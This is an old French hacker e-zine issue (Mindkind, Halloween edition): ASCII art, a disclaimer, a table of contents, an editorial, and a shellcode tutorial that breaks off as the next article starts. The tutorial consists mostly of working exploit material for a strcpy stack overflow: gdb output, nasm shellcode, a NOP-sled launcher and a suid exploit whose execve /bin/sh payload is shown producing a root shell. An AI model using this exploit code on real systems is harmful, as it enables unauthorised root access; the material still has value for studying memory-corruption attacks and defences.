.-| / | / \___. /| -\_/ | / | / | / | . / ' | .-. / \ o . ,_' \_,.-\- , |\- | | ;` \ . O ,-, ,-\ \ / | . .` `` ` |_ | | o ,` `. . ,,,_\_ / | O . /'.,',, ',-```.-##MAD#`., | .. '`'#SCIENTIST#' |`#######,##`\ \\ | | \#####,.,######`-, |#####/''`'.### | . '' / \.,-` ,.-.`#####, |###_/.-.\ `.' | ,-. O -` ' .` ``#.#, \##.` \. | | | /`, ' ` ' `` ' | '-' ,-. / `, / / \ .-. / / \ | o ' | | /``-.-.| / |/.-.\| / / | | ,--.----- ' | `-;/ / / \/ \' / / \ / / -` | | | | / / | | / / | | | ;` _,. | / | | / / | | / / | | | | / \ || \ | / / | | / / | | | |~` ; || | | _-'``| | ,```| / | | .. ~~|| ` \ -####/ \ '###/ | `.| | | || ` | |#####| | |####|\ | | '' O |/ \ \####/ \ |###/ | \_, | | . ---./ - ',./ | ; _..--++.., | ', _- \, _- | | - ;` | ,| |- `'-'` \`'-'` | / / | | || | /`. `. | | / `./ `| | | \ -, , | /` | .,`''` |`\ / \ `, `'-, . | | _,-`\ | / .--' `' | | .\ `'-, \ / / ,.-` | ` | .. | `. | | \ ` .`, `'-, ' | |-'` | .'` || |\ ,. /`' | -` | . `'-` | | | ,-` | '' ;`'--''` | | _. / ', | | | .` | \ ; / / _-` \ \ ,,- / / | .'` | ;-----'`' --` . -'``. ' | | \-` | ` O | ; | , `., ` .`/ .. / / | \ . / \ ',/ .` / -` \ / / .| '`;--`''` \ `'-` | -, ,. / _' - | ` ; ; | \ `.,/ `'/ ,\ `,' ,' / o \` / \ ', / `. /- / | o |''` \ `',_.. -, ,'. / |\ /| - / ; \ \ `.,` '/ . / | \ / | ,' ,' ' o ', `. '| ` /.,\ |`.\./.`| ,- .` ,. . `. `-` ,` / \| \._./ | /) / ,, ` o ; ',, ', ', _, ,- ` \ | / / / /- ; ', ', '-` ,- / / \._./ | / / / ,' ` . \ `-, ,-` / /| | | |_ / / / / . . ' ` \ `.-,,-''`` . ,' | | | ._/ / ' / ` ` \ .` `'-,, .` / | | | / .' | . ` . | -`,_ `'-/_ .'| | | | \ / | . | `'-.,, / o\ /` | ` | _. \ / |--------.________________.------| `;'-- ' | | | \ \ / , / // /-/ /-/ /-/ / / / \ | | | \ \ / \ / // /// /// /// / / . `. ./ | | \_)| `. / // /_/ /_/ /_/ / / | | ' o | ` / ._/----------------/_____.` | | | | / `;, . ` ` .` / \ | | | '-,_ _,-'` | | | / / `'''---''` | | \ | | ` . o . ` ; ` | \ | o | | ` o o o ` ` o | | | | | O` O` O ` o`, O ` / | | | | .---.o .---. .---. .---. .---.` \ | | | | |, | | | | | | | |O | | o | | | P | | | | U | | | | | , | | | | | y | | H | | n | | H | | Q | \ \ / | | r | | a | | d | | a | | C | | | | / | o | | c | | r | | c | | . | | | | | | f | | k | | . | | k | | 2 | \ |o | / | r | | e | | H | | e | | 6 | | | | | | e | | v | | a | | b | | 0 | | | | / | a | | e | | c | | c | | 0 | \ | | | ___| k |___| r |___| k |___| |___| |_____ | \ | / / |.-,| |.-,| |.-,| |.-,| |,-.| /\ | |/ | / /| |\ /| |\ /| |\ /| |\ /| |\ / /| \ || / /-----=---=---=---=---=---=---=---=---=-------\/ | | || | | | | | \/ / | .--=---=---=---=---=---=---=---=---=----. | | \ | | | | | | | | | | | | || | | | / | | |.-,| |.-,| |.-,| |.-,| |.-,|| | | / / | | /| |\ /| |\ /| |\ /| |\ /| || | | | | | `--=---=---=---=---=---=---=---=---=----' | | | ,,- | | | | ,,--'`` | | /--=---=---=---=---=---=---=---=---=----\ | | | /----\` / | | | | | | | | | | | || | | | ,,--'``| /\ | ,,-| | | | | | | | | | | | || | | |--'`` |/``\|,.-'`` /` | | |`-' `-' `-' `-' `-' | | | | ,\----/ | | | | | | | | _,.-'`` | | | | | | | |--`` | | | / | | | | | | |/ | | / `--' | |/ `--'` .----- - --- - -------------------------------------------------------- - - | Disclamer | .---------- - ---------------- - ----------------------------------------- - ; | : | MINDKIND 1000 . : ; : COUP D'ECLAT ! IL NE S'AGIRA PAS DU 1000ieme E-ZINE MINDKIND ! | ; | | Eh oui, c'est en effet ce que l'on pouvait lire sur la front page du | , journal de Mourial. On viens encore une fois de se faire pogner a frauder | | le cerveau humain. Tout nos sinceres regret au proprietaire de bar qui . | on eu de la difficulter a interdir l'acess au jeune qui pretendais avoir ' ; 1111 ans. ' | | | | . : Cette année encore l'halloween fait partie du calendrier, n'en deplaise à tout ceux qui auront à ramasser les vidanges cette semaine. Cette fois ` . c'est Qwzykx qui est mandater pour escalader la montagne et rapatrier la sagesse des dieux qui nous incitent encore une fois à la reflexion, . le partage et l'harmonie dans la consomations d'articles, et de temps au long de cette prochaine oeuvre désabusé. Le but légendaire du disclamer étant de nous déresponsabilisé face à toute actions plus irréfléchie que celle mentionner entre les lignes de ces articles. Sur une touche plus humanitaire, on vous invite cordialement à faire preuve de conscientisation lors de toute manipulations écrites, dessinés, copiés , codés ,laminés, écartelés ou même évicéreés des articles ci-joint. La thematique du zine étant l'halloween (no shit), on s'excuse à tout ceux qui experimentrons des flashbacks psycho-moteur à un moment ou un autres lors de la dégustation accéléré du produit. Chaste puristes couvrez vos yeux lors de cette procession des damnées, néophytes et autres groupies bienvenue à une ceuillette de bonbons virtuel et cérébral. Tel une boite d'UNICEF, puissiez-vous etre remplis d'autre choses que de cents noire. Les temps sont dure, la neige approche grand pas, sur une orbite au perigée on passe fulltrottle directions le solstice d'hivers (Merci Kepler) ont espèrent naivement vous faire oublier cette fatalitée qui s'annonce avec une grosse touche de ascii, des feelings chauds et remplis de compassion, ainsi qu'avec l'espoir de promesse concistant à revenir mettre du bois dans le poîle dans le creux de hivers, avant que vous ne mourriez d'engelures intellectuelle. D'ici la faites le tour, lisez les articles, checkez les ascii, faites des origamis avec ce zine on laisse à votre esprit tout le loisir d'utilisé ces lignes dans votre quête personelle de divertissement ephémère. Bonne collecte !! Qwzykx .---. .------. .------. .------. .----. / | | .--. | | .--. | | .--. | | .-. \ | | | | | | | | | | | | | | | | \ | | | | | | | | | | | | | | | | | | | | | | |__| | | |__| | | |__| | | |__| | '-----' '------' '------' '------' '------' .-----. .------. XXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXX XXXXXXX|XXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXX XXXXXXX|XXX XXXXX XXXXXXXXX XXXXX XXXX XXXXX XXXXX XXXXXXXXXX '-----' '------' .-----. XXXXXXXXXXXXXXXX XXXXXX XXXX XXXXXXXXXXXXX XXXXXXXXXX | | XXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXX XXXXXXX XXX | | XXXXXXXXXXXXXXXXXXXXXXXXX XXXX XXXXXXXXXXXXX XXXXXXX XXX | | XXXXXXXXXXXXXXX XXXXXXX XXXX XXXXX XXXXX XXXXXXXXXX | | | |__| | '-----' '------' .-----. .------. .------. .------. .------. | | | .--. | | .--. | | .--. | | .--. | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | \ | | |__| | | |__| | | |__| | | |_/ / '---' '------' '------' '------' '----' .---. .------. .------. .------. .----. / | | .--. | | .--. | | .--. | | .-. \ | | | | | | | | | | | | | | | | \ | | | | | | | | | | | | | | | | | | | | | | |__| | | |__| | | |__| | | |__| | '-----' '------' '------' '------' '------' .-----. .------. | | | .--. | | | | | | | | | | | | | | | | |__| | '-----' '------' .-----. .------. | | | .--. | | | | | | | | | | | | | | | | |__| | '-----' '------' .-----. .------. .------. .------. .------. | | | .--. | | .--. | | .--. | | .--. | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | \ | | |__| | | |__| | | |__| | | |_/ / '---' '------' '------' '------' '----' / |; . |; \ ; | ;| | | ;| / | ,.---,, | ; \ \\ ,'` q``. | | WW /`-_. ._-'\ WW ,; |\\ .` FCXV `, | \ ____________\\ ''\ `\ /` /`` //____________ ` , ' \ . LUNEMOONSWMOON , // / `-, \ \ / \``''/ \ / / ,-'.`,-' | | /' JMOONSA'~NLUNE|` \ /| ;, `\ .' \ ', ; q p ; ,' / '. /` ; \ / / . LUNE' `MOONE . ' , ``\ \ / \ `,__ \ ` ' / __,` ,/ \ / \ ` -- .` | ,MOON` `VNX | '-, ' | / `. '-,,_,_/` _,,,,_ `\_ _,,,-' .' \ | `--++'` ` LHWEFGI CN ' \ / ` ' / `\.. .` ` ' `. ,./ \ ' || \, MOONR` / -- ` / ;` | \., | | ,./ | `; ,-/\-. `. WQWB .` `'++--` `---,.. | ``\ V V /`` | ..,---` | | `. df ,` || ``\ / | | \ /`` | / |` `.. ..` .-/\-, \,/ | ` | \/ | | ``----'` | / |` ``''''-.... | | ....-''''`' | |\ | / | `\______?______/` /| |` | |\ ________||_____||________ `| |, | |`} .-----------. \ / .-----------. .| / |} .-----------. | / |,}.-` '-------\ MK-|OOO /-------' `-,-{|/ | `.-' ', =----=-` \--[---\ Halloween /------/ `-=----=-` - _,,..` | \ Edition / `..,,_ ,_,,..` / ,.'` _ | _ '---------------' `'., \ / ,,'; ; / ,' _.'_\.-'-.' \, ', \ / ,` | |` `. / / ,/' { oo }.'-, \ \ / / / / | .`` / .` /'`'-'`'\ `. \ / .`,/''``'| ` | -------`---------`----------------------------------- | | / \ /"\_` / | | \ / /__ _,/` /`` | | | | |/`` ` `\ .` ] / | =[O1]==[Le patrimoine lemurien ]= | \ [ Mindkind ] /, __--.__\; ]| | =[O2]==[Shellcode ]= | |[ Putois ]| |` `|` ]| | =[O3]==[Intégrisme Économique ]= | |[ Smash3r ]| | ]| | =[O4]==[Mod_rewrite ]= | |[ Wyzeman ]| | ]| | =[O5]==[Winrar Buf ]= | |[ Ivanlef0u]| _|._ ]| | =[O6]==[PNG Owns ]= | |[ h3 ]| .` `. ]| | =[O7]==[Le clown de la citoyenneté canadienne ]= | |[ c4 ]| / __ \ ]| | =[O8]==[The art of IRC spamming ]= | |[ Wyzeman ]| , | }{ | , ]| | =[O9]==[Le Spoofing ]= | |[ binf ]| \ \ / / ]| | =[1O]==[Format string under windows ]= | |[ Ivanlef0u]| `\_`--'{ }`--`_/' ]| | =[11]==[L'histoire de la scène du Quebec ]= | |[ Wyzeman ]| .--'/{}\`--. ]| | =[12]==[La vie après le cadena ]= | |[ c4 ]| / /' 00 `\ \ ]| | =[13]==[Le socialisme de sur-production ]= | |[ Wyzeman ]| ` | | ' ]| | | | | ' ' \ | | / \ |\-., , | | | ,' `\ |\`-.,----------------------------------]-------------- / \ / X X ,' `\ | ,.' / \ '., | . / 7 7 \ /`\ _|_ /`\ .-'`` / \ ``'-, | _ |\--., _ | _//`\{oo }/`\\_ | / \ | \ .`;` `' ,;; | _/` ./``-'`\, `\_ | | ----`./ @ @ \`,` / `--------------------------------` | V | / | ______ |`` \ \_/\_/ / ', _- `'--'` | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Wyzeman ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O1]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | Le `'-.,_ `''.,. `| `-, '.------- '\,_ patrimoine `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ lemurien `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : Encore une fois ]=- Bonjours à tout les lemuriens de la terre, cette fois ci, nous sommes au bord dune revolution, une revolution mindkindienne, jusqu'ici nous avions été fidèle à la volonté de nos père fondateur de rester un groupe où la contribution y étais spontanée et volontaire, ainsi que dirigé par des principes anarchiques, mais nous voici confronter à la réalité qui nous démontre que jamais nous ne pourrons atteindre nos objectifs de la sorte. Une réforme est en train de se mettre en place, une réforme à laquel tout les lémuriens disponibles seront appellés à collaborer, En nous donans les moyens de nos ambitions, nous pourrons convaincres les plus sceptiques que notre reforme peu fonctionner, elle fonctionne deja, et continura à le faire. Pour vous lecteurs, ca signifie que dès le mois de janvier, un ezine tout frais tout chaud par mois, livré à votre centre de distributions mindkind prêt de chez vous (houras pour internet). Ainsi que la possibiliter de joindre nos rangs sur demande et de vous voir accreditez l'access à un où plusieur de nos projets selon votre bonne volonter de voulloir y participer. Pour le reste, c'est a vous de nous dire ce que ca va avoir lair. Nous ne nous éterniserons pas plus longtemps sur se patrimoine lémurien à par pour faire un appelle aux ex membres de mindkind qui pourraient lires ces lignes, msg nous, nous avons quelque chose à vous offrires. Mindkind Staff | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Putois ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O2]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, `'-.,/ . `\_ '.,`-, | ``. | ``'.,, `'-,, ``---. '.,`', | `, | -=[ `''.,, ``'.,,-/``--., `.,`'., | ', | `'-.,_ `''.,. `| `-, '.------- '\,_ Shellcode `'-.,_ `'-.`_ `_.-`-. |\-.,, ``-.,_ `'-., `'+-'`.-`` | '` ', ,|\., ``-.,_ ]=- ``'-|'` | V V ,' `\ `'-.,_ | | L _|\-.,7 7 | `'-., |\-/| /;| | `--,' `../ | ``'-. |o o|_ --. ,-`/ | | . | G G | / `-=+=- ` ` /` | ,-/ `'| ., ` ,. |``````''-., `\, .--_ | | ,-'` ', \`=`/ ,` `',, |/ ; / ``'--'` _,,.---- `''--'` `-,, || || ,.-` ```''-------___"____"______,--''` -=[Aka : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ]=- _.-+. ____ __ __ ____ ___ _____ ____ ___ ____ __ _ _.-"" '. | \ | T T| \ / \ | || \ / _] / T| l/ ] +:"" '. | o )| | || D )Y Y| __j| D ) / [_ Y o || ' / | \ '. | _/ | ~ || / | O || l_ | / Y _]| || \ | \ _.-+ | | l___, || \ | || _] | \ | [_ | _ || Y | '. _.-" | | | | !| . Yl !| T | . Y| T| | || . | J \ _.-" L l__j l____/ l__j\_j \___/ l__j l__j\_jl_2005_|__j__jl__j\_j L +" J Now more Stylized + | | Www.Pyrofreak.Org \ | .+ Www.Pyrofreak.Tk \ | .-' \ | .-' \| .-' + Il y a une chose que j'ai toujours rêvé de maitriser c'était bien ces shellcodes. Pour cette documentation je suis partis du vieux truc connu l'exploit du strcpy voulant savoir jusqu'ou cela allait m'emener. J'ai donc décider de refaire de la documentation sur ce sujet pour fêter mon retour dans l'underground. Le but de ce document étant fait le plus simple du monde et je souhaite bien sur oublier aucun détail. Une note technique pour cette documentation: Elle sera à refaire sur votre console si vous voulez que les codes marchent sur votre linux.Ici j'ai utilisé une SUSE 9.1 PRO multilangage et un kernel 2.6.4 . Ce qui ne marchera pas chez vous c'est bien sur les resultats d'adresse RET obtenue dans la liste selon mes methodes, et si le code ne s'execute pas il s'agit d'un movais BUFFER . (bien sur le poid étant très important). Voila l'utilisateur est prevenu ! Qu'on se le dise ! . pupu . Et pour finir tout dépend bien sur du programme bug.c . prog bug.c : ____________ int main(int argc, char **argv) { char buffer[256]; if (argc > 1) strcpy(buffer, argv[1]); return (0); } A compiler de la facon suivante: gcc -g -o bug bug.c Ensuite on le lance avec gdb : et on y envoie des A pour le segfault gdb bug GNU gdb 6.1 Copyright 2004 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-suse-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1". (gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA Starting program: /coding/source/bug AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () On regarde si les registres ont bien été réecris: (gdb) i r eax 0x0 0 ecx 0xfffffd1f -737 edx 0xbffff4b7 -1073744713 ebx 0x4013cbd0 1075039184 esp 0xbffff1b0 0xbffff1b0 ebp 0x41414141 0x41414141 esi 0x400168c0 1073834176 edi 0x80483c0 134513600 eip 0x41414141 0x41414141 eflags 0x210286 2163334 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 et maintenant on va prendre quelque adresse pour nous donner les adresses vulnerables grâce à cette commande: (gdb) x/200bx $esp-200 0xbfffefe8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbfffeff0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbfffeff8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff000: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff008: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff010: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff018: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff020: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff028: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff030: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff038: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff040: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff048: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff050: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff058: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff060: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff068: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff070: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff078: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff080: 0x41 0x41 0x41 0x41 0x41 0x41 0x61 0x41 0xbffff088: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff090: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff098: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff0a0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff0a8: 0x61 0x41 0x41 0x41 0x41 0x41 0x41 0x41 Ce qui nous interresse ici c'est les adresses qui contiennent 0x41 par exemple 0xbffff008 pourrait bien nous servir plus tard. Nous avons donc toutes nos informations nécessaires pour notre futur shellcode pour la partie suivante nous allons apprendre à utiliser nasm pour le transformer en byte code. Le code ci-dessous pyro.asm va servir à afficher bienvenu dans pyrofreak et mindkind.asm bienvenue chez mindkind comme ca vous pourrez choisir vos camps favoris ;). fichier pyrofreak.asm: _____________________ ;pyrofreak.asm [SECTION .text] global _start _start: jmp short ender starter: xor eax, eax ;clean up the registers xor ebx, ebx xor edx, edx xor ecx, ecx mov al, 4 ;syscall write mov bl, 1 ;stdout is 1 pop ecx ;get the address of the string from the stack mov dl, 26 ;length of the string int 0x80 xor eax, eax mov al, 1 ;exit the shellcode xor ebx,ebx int 0x80 ender: call starter ;put the address of the string on the stack db 'hello welcome to pyrofreak ' Pour le compiler executez la commande suivante: linux:/coding/source # nasm -f elf hello.asm linux:/coding/source # ld -o pyro pyrofreak.o Vérifiez que votre code fonctionne : linux:/coding/source # ./pyro hello welcome to pyrofreaklinux:/coding/source # Notes: Les codes asm cités eux sont génériques. Reste à traduire le code pyro en bytes code : linux:/coding/source # objdump -d pyro pyro: format de fichier elf32-i386 Déassemblage de la section .text: 08048080 <_start>: 8048080: eb 19 jmp 804809b 08048082 : 8048082: 31 c0 xor %eax,%eax 8048084: 31 db xor %ebx,%ebx 8048086: 31 d2 xor %edx,%edx 8048088: 31 c9 xor %ecx,%ecx 804808a: b0 04 mov $0x4,%al 804808c: b3 01 mov $0x1,%bl 804808e: 59 pop %ecx 804808f: b2 1a mov $0x1a,%dl 8048091: cd 80 int $0x80 8048093: 31 c0 xor %eax,%eax 8048095: b0 01 mov $0x1,%al 8048097: 31 db xor %ebx,%ebx 8048099: cd 80 int $0x80 0804809b : 804809b: e8 e2 ff ff ff call 8048082 80480a0: 68 65 6c 6c 6f push $0x6f6c6c65 80480a5: 20 77 65 and %dh,0x65(%edi) 80480a8: 6c insb (%dx),%es:(%edi) 80480a9: 63 6f 6d arpl %bp,0x6d(%edi) 80480ac: 65 20 74 6f 20 and %dh,%gs:0x20(%edi,%ebp,2) 80480b1: 70 79 jo 804812c 80480b3: 72 6f jb 8048124 80480b5: 66 data16 80480b6: 72 65 jb 804811d 80480b8: 61 popa 80480b9: 6b .byte 0x6b 80480ba: 20 .byte 0x20 et voila la partie la plus pénible dans l'art du shell code qui sagit de mettre les codes que vous voyez xeb/x19 dans des "". Voici un premier résultat de code généique ici le programme: pyromind.c /* Pour compiler: cc -o pyromind pyromind.c ./pyromind -p ./pyromind -m Auteur mrpupu[corbeille] . Aout 2005 . */ #include char welcome_to_pyro[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59" "\xb2\x1a\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff" "\x68\x65\x6c\x6c\x6f\x20\x77\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20" "\x70\x79\x72\x6f\x66\x72\x65\x61\x6b\x20"; char welcome_to_mind[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59" "\xb2\x1a\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80" "\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x65\x6c" "\x63\x6f\x6d\x65\x20\x74\x6f\x20\x6d\x69\x6e\x64\x6b\x69\x6e\x64\x20"; int main(int argc, char *argv[]) { int opt; while ((opt=getopt(argc,argv, "pmh")) != EOF){ switch(opt){ default: case 'h': banner(argv[0]); exit(0); case 'p': pyro(argv[1]); exit(0); case 'm': mind(argv[1]); exit(0); } } } int pyro() { int (*funct)(); funct = (int (*)()) welcome_to_pyro; (int)(*funct)(); } int mind() { int (*funct)(); funct = (int (*)()) welcome_to_mind; (int)(*funct)(); } int banner() { printf ("Bonjour et bienvenue dans notre mag \n"); printf ("___________________________________ \n \n"); printf ("A compiler de la facon suivante \n\n"); printf ("cc -o pyromind pyromind.c\n\n"); printf ("./pyromind -h \n\n"); printf ("./pyromind -p \n\n"); printf ("./pyromind -m \n\n"); } Le code ci dessous lance et execute le shellcode welcome to pyro ou welcome to mindkind , nous allons donc le reprendre et voir si on arrive à l'executer avec les adresses RET obtenues dans notre cher bug.c Fichier EXP.C : _______________ #include #include #include #include #define BUF 269 #define NOP 0x90 #define ALIGN 0 char sc[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59" "\xb2\x1a\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80" "\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f\x20\x77\x65\x6c" "\x63\x6f\x6d\x65\x20\x74\x6f\x20\x6d\x69\x6e\x64\x6b\x69\x6e\x64\x20"; unsigned long getesp() { __asm__("movl %esp,%eax"); } int main(int argc ,char *argv[]) { int ret,i,n; char *arg[3], buf[BUF]; int *addrptr; ret = getesp() -atoi(argv[1]); fprintf(stderr, "Using ret: 0x%X \n ",ret); addrptr=(int *)(buf + ALIGN); for (i=0; i < BUF; i +=4) *addrptr++=ret; for (i=0; i< BUF / 2; i++) buf[i] = NOP; for (n=0; n< strlen(sc); n++) buf[i++] = sc[n]; arg[0] = "./bug"; arg[1] = buf; arg[2] = NULL; execve(arg[0], arg,NULL); perror("execve"); } Pour compiler : cc -o exp exp.c Pour l'utiliser : ./exp -3000 par exmple , vous avez ici 4000 possibilitées. Maintenant que nous avons trouvé une adresse nous pouvons faire plein de chose ! par exemple si le bug était un suid root cela pourrait donner: linux:/mnt/emag # chmod 4755 /bin/bug linux:/mnt/emag # ls -la /bin/bug -rwsr-xr-x 1 root root 8669 2005-08-16 17:12 /bin/bug On verifie que notre bug est bien un suid root: linux:/mnt/prog # find / -type f -perm -04000 -ls 18184 24 -rwsr-xr-x 1 root root 22952 avr 6 2004 /bin/su 85366 12 -rwsr-xr-x 1 root root 8669 aoû 16 17:12 /bin/bug 15447 32 -rwsr-xr-x 1 root root 31236 avr 6 2004 /bin/ping 10453 24 -rwsr-xr-x 1 root audio 22630 avr 6 2004 /bin/eject 46454 88 -rwsr-xr-x 1 root root 87296 avr 6 2004 /bin/mount 15448 28 -rwsr-xr-x 1 root root 27108 avr 6 2004 /bin/ping6 linux:/mnt/emag # su cheoles cheoles@linux:/mnt/emag> ls bug bug.c exp exp.c mindkind.asm notes.txt pyrofreak.asm pyromind.c suid suid.c cheoles@linux:/mnt/emag> ./suid sh-2.05b$ exit exit Et voila notre exploit fonctionne ! Pour finir voici notre exploit suid.c: Fichier suid.c ______________ #include #include #include #include #define BUF 273 // 272+1 (at 272 ebp & eip are overwritten+1 for null // byte) #define NOP 0x90 // nop padding (nop instruction code = 0x90) #define ALIGN 0 // no alignment (buffer is 1st on stack) #define RET 0xbffffce0 // adresse trouvée dans le labo à pupu ;) char sc[]= /* des shellcode classique execve /bin/sh en nasm */ "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; int main(int argc, char *argv[]) { int ret, i, n; char *arg[3], buf[BUF]; int *addrptr; /* address pointer */ ret = RET; addrptr = (int *)(buf + ALIGN); for (i = 0; i < BUF; i += 4) *addrptr++ = ret; for (i = 0; i < BUF / 2; i++) buf[i] = NOP; for (n = 0; n < strlen(sc); n++) buf[i++] = sc[n]; arg[0] = "/bin/bug"; // le programme vulnerable ici arg[1] = buf; arg[2] = NULL; execve(arg[0], arg, NULL); perror("\n execve"); } A noter: suid.c ne sera valable que pour suse 9.1 et pas sur votre console. tout à cause de cette fameuse adresse RET. linux:/mnt/emag # cc -o suid suid.c linux:/mnt/emag # su cheoles cheoles@linux:/mnt/emag> ./suid sh-2.05b# id uid=0(root) gid=100(users) groups=14(uucp),16(dialout),17(audio),33(video),100(users) sh-2.05b# exit exit cheoles@linux:/mnt/emag> | ,--., x . __^__ -=*=- ,' NG \ --- "`-. | . ; | MOON T| + - -- | }` ` | /X@ BG| x -- / /--. \ H/ - ===/ \===E w {\_/} w `'--'` , . --- / / * /`-_.-{"}-._-'\ `---` / , '?' , \ , _.-.,, , x / / \./;"-";\./ \ \ -+- -` .|.,,`'-.,,_ , '`_-` `',`' ` ,-` ,-` |\ ``'-.,,_''--, / \ ,' -` \\\\\., `''-/,', ,,,,,,,,,,,,,, | BY | _ __ /- -' \\` X ` /`-- `','., ',,,| |, _ `` '| `. ', \| X v` | // ^--``\_, `','., | | ` | `. `.`. -` `\// /` ``\ ;- `',`-, |-=[ Smash3r ]=-| | `. `.='-'` \ `-/ / .`;\| `'.`', | | | '/..````/.\, ```\/` . `'.`'., | | |-=[O3]=-| ``'-,, `''.,,``-/` _/`\ `'.,'., | | \_ | ``'.,, 